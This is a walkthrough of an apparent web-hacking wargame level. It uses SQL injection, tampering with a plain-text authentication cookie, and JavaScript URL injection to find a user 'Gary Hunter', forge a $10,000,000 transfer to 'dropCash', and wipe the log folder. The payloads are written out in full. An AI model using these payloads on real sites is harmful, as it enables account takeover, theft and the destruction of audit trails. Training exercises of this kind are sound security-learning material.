Cookie Injection,Java Script Injection & Sql Injection Method
Information
From the navigation and source code of pages, we gather following information:
Description | Page | Fields |
Register pages | Register.php > register2.php |
|
Login pages | login1.php > login2.php |
|
Purge files | cleardir.php | <input type=’hidden’ name=’dir’ value=’loginSQLFiles’> |
Transfer money from one account to another | movemoney.php |
|
Authentication cookie (created after successful authentication):
- accountUsername=<login>
- accountPassword=<password>
Our target:
- Name: Garry Hunter
- Transfer $10,000,000 into the account dropCash.
- Log directory: logFiles
Objective 1: Find the account of Gary Hunter
First create your own account and log in. Once done, type following command in the url bar: javascript:alert(document.cookie); It shows our cookie value, indicating that the site is vulnerable. Then connect to user info page and enter a SQL injection to show the list of all users: ‘ or ‘a’=’a.
By scrolling down, we find:
GaryWilliamHunter : — $$$$$ —
The 2 values are separated by a colon:
- Before colon: the login (GaryWilliamHunter)
- After colon: the description (– $$$$$ –)
Objective 2: Move the $10,000,000 into the account dropCash
By entering following code in the URL, we see that the site is vulnerable to cookie injection because it displays in clear cookie information.
javascript:alert(document.cookie);
Install Firebug and Firecookie for Firefox. We then have to change value of cookie named “accountUsername” to “GaryWilliamHunter” and use following JS injection (copy/paste in the URL):
javascript:void(document.write(‘<form method=post action=movemoney.php><input type=hidden name=TO value=dropCash /><input type=hidden name=AMOUNT value=10000000 /><input type=submit value=transfer /></form>’))
It will dynamically write a form on the page, containing necessary values for a transfer:
- FORM ACTION: movemoney.php, as specified in the exercise
- FROM: value taken from the modified cookie (GaryWilliamHunter)
- TO: value of dropCash, as stated in the exercise. We know this field from the information we gathered.
- AMOUNT: value specified in the exercise. We know this field from the information we gathered.
By validating the form, it will complete the stage.
Objective 3: Clear The Logs, They’re held in the folder ‘logFiles’
Copy/paste following code in the URL:
javascript:void(document.write(‘<form method=post action=cleardir.php><input type=hidden name=dir value=logFiles /><input type=submit value=”cover my tracks” /></form>’))
PS: You can also use the Firefox add-on “Tamper Data” or Google Chrome’s “Inspect Element” option instead of Firecookie and Firebug.